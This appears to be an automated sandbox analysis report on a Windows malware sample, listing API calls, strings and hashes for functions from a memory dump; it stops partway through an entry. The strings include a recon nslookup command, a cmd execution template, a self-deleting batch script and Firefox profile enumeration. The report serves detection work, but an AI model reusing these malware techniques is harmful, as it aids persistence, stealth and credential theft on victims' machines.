Opcode Fuzzy Hash: b5f1d21e78f2803155cf3fe7f060cdb906917b8ca92cf455d061f10db8d332d5
Instruction Fuzzy Hash: E2219372944204BFDB219FA8CC85FEABBACEF84754F144122F904DB251D670DD80DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 009CAF8A, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 55registrymemorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(009BAB0F,00000000,00000000,009DE280,?,?,009B4379,009BAB0F,00000000,009BAB0F,009DE260), ref: 009CAF9D
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 009CAFAB
wsprintfA.USER32 ref: 009CAFC0
RegCreateKeyA.ADVAPI32(80000001,009DE260,00000000), ref: 009CAFD8
lstrlen.KERNEL32(?), ref: 009CAFE7
RegSetValueExA.ADVAPI32(00000001,00000000,00000000,00000001,?,00000001), ref: 009CAFF5
RegCloseKey.ADVAPI32(?), ref: 009CB000
HeapFree.KERNEL32(00000000,00000000), ref: 009CB00F

Strings

@%s@, xrefs: 009CAFBA

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreeValuewsprintf
String ID: @%s@
API String ID: 1575615994-4128794767
Opcode ID: 20ebeac26f50ba40ee1f768f00f2d926cfdba63c44fb8f242735d9432dcdb0e2
Instruction ID: e8a88035e4a11dd4966fb2823a26ba57f75643231bd8ba09675b23334a972278
Opcode Fuzzy Hash: 20ebeac26f50ba40ee1f768f00f2d926cfdba63c44fb8f242735d9432dcdb0e2
Instruction Fuzzy Hash: E10192365A6104BFEB115F94EC49FAB3B3DEB48754F104026FA0595170DBB18D94EB60

Uniqueness

Uniqueness Score: -1.00%

Function 009C209D, Relevance: 15.3, APIs: 10, Instructions: 274memorythreadCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 009C2114
VirtualAlloc.KERNEL32(00000000,00008000,00003000,00000004), ref: 009C2133
GetLastError.KERNEL32 ref: 009C23F0
RtlEnterCriticalSection.NTDLL(?), ref: 009C2400
RtlLeaveCriticalSection.NTDLL(?), ref: 009C2411
RtlExitUserThread.NTDLL(?), ref: 009C241F

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: AllocCriticalSectionVirtual$EnterErrorExitLastLeaveThreadUser
String ID:
API String ID: 2137648861-0
Opcode ID: ce47ef6fd3a70b3f0468563240976f2b7bad594e0738f47db7ebd6ec418ed3a5
Instruction ID: 524a501154445a6026f9088d19471adc427c2e4c3aca81e8225c84acca9eaf0e
Opcode Fuzzy Hash: ce47ef6fd3a70b3f0468563240976f2b7bad594e0738f47db7ebd6ec418ed3a5
Instruction Fuzzy Hash: 13A15770940249AFDB209F25CC84FAA7BBDFF18745F10452AF916D61A1DB349C88DF22

Uniqueness

Uniqueness Score: -1.00%

Function 009C0E10, Relevance: 15.1, APIs: 10, Instructions: 94filememorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009B8BC3: memset.NTDLL ref: 009B8BE5
Part of subcall function 009B8BC3: CloseHandle.KERNEL32(?,?,?,?,?), ref: 009B8C92

MapViewOfFile.KERNEL32(?,00000004,00000000,00000000,?,?,?,?), ref: 009C0E57
CloseHandle.KERNEL32(?), ref: 009C0E63
PathFindFileNameW.SHLWAPI(?), ref: 009C0E73
lstrlenW.KERNEL32(00000000), ref: 009C0E7D
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C0E8E
wcstombs.NTDLL ref: 009C0E9F
lstrlen.KERNEL32(?), ref: 009C0EAC
UnmapViewOfFile.KERNEL32(?,?,?,?,00000001), ref: 009C0EE2
HeapFree.KERNEL32(00000000,00000000), ref: 009C0EF4
DeleteFileW.KERNEL32(?), ref: 009C0F02

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CloseHandleHeapViewlstrlen$AllocateDeleteFindFreeNamePathUnmapmemsetwcstombs
String ID:
API String ID: 2256351002-0
Opcode ID: 809bd0c289b0f81291dab773e4c821a5dc511f2351e5a7afc3cf6d0c7a3442a0
Instruction ID: 32c73163fbbe3a3c3d80a27ed18dd968582d0e1283d74c86126d463b18ac5a1c
Opcode Fuzzy Hash: 809bd0c289b0f81291dab773e4c821a5dc511f2351e5a7afc3cf6d0c7a3442a0
Instruction Fuzzy Hash: C1314771856119EFCF21AFA4DD88EEF7B79FF44345F00446AF601A2121DB308A95EB61

Uniqueness

Uniqueness Score: -1.00%

Function 009D59F7, Relevance: 15.1, APIs: 10, Instructions: 64sleepsynchronizationCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,009B8A31,?,00000000,009D0F94,00000000,00000000), ref: 009D5A0B

Part of subcall function 009C51FB: InterlockedExchange.KERNEL32(00000002,000000FF), ref: 009C5202

WaitForSingleObject.KERNEL32(?,000000FF,0000003C,?,00000000,009D0F94,00000000,00000000), ref: 009D5A25
CloseHandle.KERNEL32(?,?,00000000,009D0F94,00000000,00000000), ref: 009D5A2E
CloseHandle.KERNEL32(?,0000003C,?,00000000,009D0F94,00000000,00000000), ref: 009D5A3C
RtlEnterCriticalSection.NTDLL(00000008), ref: 009D5A48
RtlLeaveCriticalSection.NTDLL(00000008), ref: 009D5A71
Sleep.KERNEL32(000001F4,009D0F94,00000000,00000000), ref: 009D5A80
CloseHandle.KERNEL32(?), ref: 009D5A8D
LocalFree.KERNEL32(?), ref: 009D5A9B
RtlDeleteCriticalSection.NTDLL(00000008), ref: 009D5AA5

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 96711f709373af52f3c3e65743d22b43cbf75a3d8cc73c9b83811388c960d8e5
Instruction ID: 51756d042aa28feb37009486c009cdb301ead3f2b0b14961891c4f04dd7e165f
Opcode Fuzzy Hash: 96711f709373af52f3c3e65743d22b43cbf75a3d8cc73c9b83811388c960d8e5
Instruction Fuzzy Hash: 4F118171595A25AFCB20AF65DC8CE9B77BCBF443013058A1AF642D3622CB34F884DB50

Uniqueness

Uniqueness Score: -1.00%

Function 009D209D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 009D20C8
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 009D20E5
HeapFree.KERNEL32(00000000,00000000), ref: 009D2118
RtlImageNtHeader.NTDLL(00000000), ref: 009D2143
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 009D2200

Part of subcall function 009C32D8: lstrlen.KERNEL32(?,00000000,74786980,?,009CAEA4,?), ref: 009C32E1
Part of subcall function 009C32D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 009C3304
Part of subcall function 009C32D8: memset.NTDLL ref: 009C3313

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 009D21AF
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 009D21E0

Strings

TorClient, xrefs: 009D217E, 009D21CB

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: 63b05497732776952b69121fa034881fe9a4bd96d356b07e53befdc53b1e5f7e
Instruction ID: 9dd7e78c70e56486a325c6681f398544bd747cd0807e9f770748fe5653d90307
Opcode Fuzzy Hash: 63b05497732776952b69121fa034881fe9a4bd96d356b07e53befdc53b1e5f7e
Instruction Fuzzy Hash: 0B41E4356D9204FBEB225B94CC45FAE7BADEB64740F10C027F605AA390DBB08E80E750

Uniqueness

Uniqueness Score: -1.00%

Function 009C091D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,74785520,009B6990,74785520,00000001,@ID@,009CF47B,?), ref: 009C0934
lstrlen.KERNEL32(?), ref: 009C0944
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 009C0978
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 009C09A3
memcpy.NTDLL(00000000,?,?), ref: 009C09C2
HeapFree.KERNEL32(00000000,00000000), ref: 009C0A23
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 009C0A45

Strings

W, xrefs: 009C0A71

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: 07e775d604a94a7ef94f5285cd64bdba438ef7ad64866dd37867b2d21543d665
Instruction ID: 14f34f6074bf0b0aa46a044ca1f9c72e5b4f878e4b7953b367e9cdb630f84192
Opcode Fuzzy Hash: 07e775d604a94a7ef94f5285cd64bdba438ef7ad64866dd37867b2d21543d665
Instruction Fuzzy Hash: 394106B1D01209EFDF11DF98CC84FAE7BB9EF88344F14846AE904A7211E7319A54DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009BA123, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 009BA144

Part of subcall function 009C1B2B: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,009BA164,?), ref: 009C1B50
Part of subcall function 009C1B2B: RtlAllocateHeap.NTDLL(00000000,?), ref: 009C1B62
Part of subcall function 009C1B2B: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,009BA164,?), ref: 009C1B7F
Part of subcall function 009C1B2B: lstrlenW.KERNEL32(00000000,?,?,009BA164,?), ref: 009C1B8B
Part of subcall function 009C1B2B: HeapFree.KERNEL32(00000000,00000000,?,?,009BA164,?), ref: 009C1B9F

RtlEnterCriticalSection.NTDLL(00000000), ref: 009BA17C
CloseHandle.KERNEL32(?), ref: 009BA18A
HeapFree.KERNEL32(00000000,?,?,00000001,.dll,?,00001000,?,?,?), ref: 009BA242
RtlLeaveCriticalSection.NTDLL(00000000), ref: 009BA251
HeapFree.KERNEL32(00000000,00000000,.dll,?,00001000,?,?,?), ref: 009BA264

Strings

.dll, xrefs: 009BA199
.exe, xrefs: 009BA1A0, 009BA1B2, 009BA1E8

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 458ca717476e6bf989488942e99af8875e49370273f1dc6861873547d7a1392b
Instruction ID: fd4aeb0b3a2ffb74c1216dd84baf8e08ff609d6b8a92a6f49d1c714a6cf214f8
Opcode Fuzzy Hash: 458ca717476e6bf989488942e99af8875e49370273f1dc6861873547d7a1392b
Instruction Fuzzy Hash: BF41D232A55305ABDB21AF99DD84FDF77BDAF80720F00402AF910A6161DB71DD84DB91

Uniqueness

Uniqueness Score: -1.00%

Function 009D1A07, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(009DDF6C), ref: 009D1A19
lstrcpy.KERNEL32(00000000), ref: 009D1A4E

Part of subcall function 009D134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,009C1372,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?,00000001), ref: 009D135A
Part of subcall function 009D134B: mbstowcs.NTDLL ref: 009D1376

GetLastError.KERNEL32(00000000), ref: 009D1ADF
HeapFree.KERNEL32(00000000,?), ref: 009D1AF6
InterlockedDecrement.KERNEL32(009DDF6C), ref: 009D1B0D
DeleteFileA.KERNEL32(00000000), ref: 009D1B2E
HeapFree.KERNEL32(00000000,00000000), ref: 009D1B3E

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

Strings

.avi, xrefs: 009D1A41

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: b83dd577fd17ba7b23c14546e35417e0c3074dcd44d53eb73e812dedbbbe80b1
Instruction ID: 08dc29d9184a65c7f5af9aafe4e34182b5efcca73b61978f1a23178a9e835fdc
Opcode Fuzzy Hash: b83dd577fd17ba7b23c14546e35417e0c3074dcd44d53eb73e812dedbbbe80b1
Instruction Fuzzy Hash: 2631C332E96114BBCB116FA5DC04BAE7BB9EB88751F11C417F905A7250EA748E80E790

Uniqueness

Uniqueness Score: -1.00%

Function 009BDA1D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8812
Part of subcall function 009C8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C882B
Part of subcall function 009C8800: GetCurrentThreadId.KERNEL32 ref: 009C8838
Part of subcall function 009C8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8844
Part of subcall function 009C8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,009CBE68,00000000,?,00000000,00000000,?), ref: 009C8852
Part of subcall function 009C8800: lstrcpy.KERNEL32(00000000), ref: 009C8874

lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 009BDA41

Part of subcall function 009C78E3: lstrlen.KERNEL32(00000000,747DF730,-00000001,00000000,?,?,?,009BDA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009C78F4
Part of subcall function 009C78E3: lstrlen.KERNEL32(?,?,?,?,009BDA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009C78FB
Part of subcall function 009C78E3: RtlAllocateHeap.NTDLL(00000000,?), ref: 009C790D
Part of subcall function 009C78E3: _snprintf.NTDLL ref: 009C7930
Part of subcall function 009C78E3: _snprintf.NTDLL ref: 009C7959
Part of subcall function 009C78E3: HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 009C797A

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009BDACD
HeapFree.KERNEL32(00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009BDAEA
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009BDAF2
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009BDB01

Strings

s:, xrefs: 009BDAC3
ss: *.*.*.*, xrefs: 009BDA83, 009BDA88, 009BDAAB
nslookup myip.opendns.com resolver1.opendns.com , xrefs: 009BDA4E

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: f90991a67ccb46176c20e0e0c7c88cc51d9e1fee3b13d374ec5914c7544f120e
Instruction ID: 8af0ece89bdb040695859bceb6b57b30d58c4d43ffeff484dcc0c88be8ac06c6
Opcode Fuzzy Hash: f90991a67ccb46176c20e0e0c7c88cc51d9e1fee3b13d374ec5914c7544f120e
Instruction Fuzzy Hash: C0218072A45205BFDB119BE9CD85FEFBBBCEB58310F040469F505E2142EBB09A40D760

Uniqueness

Uniqueness Score: -1.00%

Function 009BEF65, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 009BEF89

Part of subcall function 009CC747: lstrcpy.KERNEL32(-000000FC,00000000), ref: 009CC781
Part of subcall function 009CC747: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,009BEF96,?,?,?), ref: 009CC793
Part of subcall function 009CC747: GetTickCount.KERNEL32 ref: 009CC79E
Part of subcall function 009CC747: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,009BEF96,?,?,?), ref: 009CC7AA
Part of subcall function 009CC747: lstrcpy.KERNEL32(00000000), ref: 009CC7C4

Part of subcall function 009D247D: RtlAllocateHeap.NTDLL(00000000,00000200,009C6D11), ref: 009D2489

lstrcpy.KERNEL32(00000000), ref: 009BEFB9
wsprintfA.USER32 ref: 009BEFCC
GetTickCount.KERNEL32 ref: 009BEFE1
wsprintfA.USER32 ref: 009BEFEF

Part of subcall function 009C4FB0: HeapFree.KERNEL32(00000000,00000200,009C6EB2,00000000,00000100,00000200), ref: 009C4FBC

Strings

attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 009BEFE9
"%S", xrefs: 009BEFC6
.bat, xrefs: 009BEFAC

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: e67c535764b06258c99903f2a1c32dbc642ab767c12c02d75b529e79c2bbb9ed
Instruction ID: a3142a75f382ebb7a28edb4e83787444c2f620a127ee03fca00ceed30f90c23d
Opcode Fuzzy Hash: e67c535764b06258c99903f2a1c32dbc642ab767c12c02d75b529e79c2bbb9ed
Instruction Fuzzy Hash: 161101729463157BC2103BB4AC19F9F7B9CCFC5724F04842AFD4562263DE749C0086B6

Uniqueness

Uniqueness Score: -1.00%

Function 009C78E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,747DF730,-00000001,00000000,?,?,?,009BDA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009C78F4
lstrlen.KERNEL32(?,?,?,?,009BDA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 009C78FB
RtlAllocateHeap.NTDLL(00000000,?), ref: 009C790D
_snprintf.NTDLL ref: 009C7930

Part of subcall function 009BB598: memset.NTDLL ref: 009BB5AD
Part of subcall function 009BB598: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB5E6
Part of subcall function 009BB598: wcstombs.NTDLL ref: 009BB5F0
Part of subcall function 009BB598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 009BB621
Part of subcall function 009BB598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB64D
Part of subcall function 009BB598: TerminateProcess.KERNEL32(?,000003E5), ref: 009BB663
Part of subcall function 009BB598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,009C793E), ref: 009BB677
Part of subcall function 009BB598: CloseHandle.KERNEL32(?), ref: 009BB6AA
Part of subcall function 009BB598: CloseHandle.KERNEL32(?), ref: 009BB6AF

_snprintf.NTDLL ref: 009C7959

Part of subcall function 009BB598: GetLastError.KERNEL32 ref: 009BB67B
Part of subcall function 009BB598: GetExitCodeProcess.KERNEL32(?,00000001), ref: 009BB69B

HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 009C797A

Strings

cmd /C "%s> %s1", xrefs: 009C791F, 009C7927, 009C7952
echo -------- >, xrefs: 009C794D

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: f6da520f04bd6f882a6bddc41a641247a12517b5f14e9f6761de56b5f32c5ec7
Instruction ID: 82e8eb6d3ef7a7fbf910caf94f24868a277cf4efbf05398adc2ae0d940eedb40
Opcode Fuzzy Hash: f6da520f04bd6f882a6bddc41a641247a12517b5f14e9f6761de56b5f32c5ec7
Instruction Fuzzy Hash: 5711C172815218BFCF125F88DC05ECEBF39EF487A0F108156F90566261C7719E90EB90

Uniqueness

Uniqueness Score: -1.00%

Function 009D14AB, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 009D14C2
lstrlen.KERNEL32(?), ref: 009D14CA
lstrlen.KERNEL32(?), ref: 009D1535
RtlAllocateHeap.NTDLL(00000000,?), ref: 009D1560
memcpy.NTDLL(00000000,00000002,?), ref: 009D1571
memcpy.NTDLL(00000000,?,?), ref: 009D1587
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 009D1599
memcpy.NTDLL(00000000,009D83E4,00000002,00000000,?,?,00000000,?,?), ref: 009D15AC
memcpy.NTDLL(00000000,?,00000002), ref: 009D15C1

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: d61029ddbc5d92170abea6163da66b4a738b2f02610e08d870c1358eb0da8c7a
Instruction ID: 8f19952de857d85f45828c5518af5caca509d7eabcd5753c86a72012ade712be
Opcode Fuzzy Hash: d61029ddbc5d92170abea6163da66b4a738b2f02610e08d870c1358eb0da8c7a
Instruction Fuzzy Hash: 6D413D72D40219FBCF01DFA8DC81A9EBBB9EF88354F14845AF905A3211E735EA51DB90

Uniqueness

Uniqueness Score: -1.00%

Function 009CE710, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 009CB8FB: RtlEnterCriticalSection.NTDLL(009DE268), ref: 009CB903
Part of subcall function 009CB8FB: RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009CB918
Part of subcall function 009CB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 009CB931

RtlAllocateHeap.NTDLL(00000000,009D26D1,00000000), ref: 009CE761
lstrlen.KERNEL32(00000008,?,?,?,009D26D1,00000000), ref: 009CE770
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 009CE782
HeapFree.KERNEL32(00000000,00000000,?,?,?,009D26D1,00000000), ref: 009CE792
memcpy.NTDLL(00000000,00000000,009D26D1,?,?,?,009D26D1,00000000), ref: 009CE7A4
lstrcpy.KERNEL32(00000020,00000008), ref: 009CE7D6
RtlEnterCriticalSection.NTDLL(009DE268), ref: 009CE7E2
RtlLeaveCriticalSection.NTDLL(009DE268), ref: 009CE83A

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: 792fff8764c1348532cd9d17a61f9589830f43addd1bfd13f29e488c58f543b4
Instruction ID: 61bf859fc66b7a51001055b338d856aa9bad610b1739d85b6fa3d24291d32291
Opcode Fuzzy Hash: 792fff8764c1348532cd9d17a61f9589830f43addd1bfd13f29e488c58f543b4
Instruction Fuzzy Hash: 2B419770955705EFDB219F68CC84B9ABBF8FB08300F10851EF95A97261CB309984EF91

Uniqueness

Uniqueness Score: -1.00%

Function 009C4241, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,009C1ED8), ref: 009C4282
GetLastError.KERNEL32 ref: 009C428C
WaitForSingleObject.KERNEL32(000000C8), ref: 009C42B1
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 009C42D2
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 009C42FA
WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 009C430F
SetEndOfFile.KERNEL32(00000006), ref: 009C431C
GetLastError.KERNEL32 ref: 009C4328
CloseHandle.KERNEL32(00000006), ref: 009C4334

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 90c19413a612c85f9e9ac029cc6901735a2c730cf448de8ace73fa10f51104a5
Instruction ID: f7f96da02abb535ec07c55971afb8a3fd9fcfc1fa28b5968aeb9a24c8675138b
Opcode Fuzzy Hash: 90c19413a612c85f9e9ac029cc6901735a2c730cf448de8ace73fa10f51104a5
Instruction Fuzzy Hash: 13318171950209FFEB109FA4DD0AFAE7BB9EB04315F104169F920E61E1C7744A94DB61

Uniqueness

Uniqueness Score: -1.00%

Function 009C2EE9, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,009BEF3A,00000008,009C79A9,00000010,00000001,00000000,0000012B,009C79A9,00000000), ref: 009C2F08
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 009C2F3C
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 009C2F44
GetLastError.KERNEL32 ref: 009C2F4E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 009C2F6A
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 009C2F83
CancelIo.KERNEL32(?), ref: 009C2F98
CloseHandle.KERNEL32(?), ref: 009C2FA8
GetLastError.KERNEL32 ref: 009C2FB0

Memory Dump Source

Source File: 00000000.00000002.611446340.00000000009B0000.00000040.00000001.sdmp, Offset: 009B0000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: c8964a694257e83a26aa0b2d50e04fd80bafd6bdf8ea7dc7540a23abc8c18b47
Instruction ID: 97421fd62b4b3669cf4a7a30f364a74e3f5832b39e2f2b313158766b129c285f
Opcode Fuzzy Hash: c8964a694257e83a26aa0b2d50e04fd80bafd6bdf8ea7dc7540a23abc8c18b47
Instruction Fuzzy Hash: BD218D7294911CFFCB019FA9DC48DEF7B7DEB48310B00442AF905D2151DB708A84DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 009CB0AA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 009D134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,009C1372,?,?,00000000,009B1589,?,00000000,?,009C5B4A,?,00000001), ref: 009D135A
Part of subcall function 009D134B: mbstowcs.NTDLL ref: 009D1376

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,009B7010), ref: 009CB0FD

Part of subcall function 009C888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 009C88D9
Part of subcall function 009C888D: lstrlenW.KERNEL32(?,?,00000000), ref: 009C88E5
Part of subcall function 009C888D: memset.NTDLL ref: 009C892D
Part of subcall function 009C888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 009C8948
